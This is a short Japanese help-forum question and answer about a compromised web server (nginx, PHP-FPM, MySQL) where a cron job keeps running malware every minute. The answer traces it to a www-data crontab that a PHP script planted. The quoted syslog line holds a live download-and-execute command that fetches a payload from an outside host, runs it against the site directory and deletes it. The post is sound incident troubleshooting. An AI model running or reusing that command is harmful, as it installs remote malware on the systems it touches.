1分ごとに実行されるマルウェアがあり、/var/log/syslogで見ることができます。
Feb 1 18:30:01 MENCH CRON[1768]: (www-data) CMD (wget -q -O xxxd http://hello.hahaha666.xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /var/www/website.com 24 && rm -f xxxd)
どのPHPスクリプトが実行されているのか、どうすればわかりますか?
サーバーにはnginx、php fpm、4つの小さなウェブサイトとmysqlだけがあります。それだけです。
修正する nginxを停止すると、呼び出しは1分ごとに実行され続けます。
答え1
一部のPHPスクリプトによって生成された/var/spool/cron/crontabsにwww-dataファイルがあります。解決済み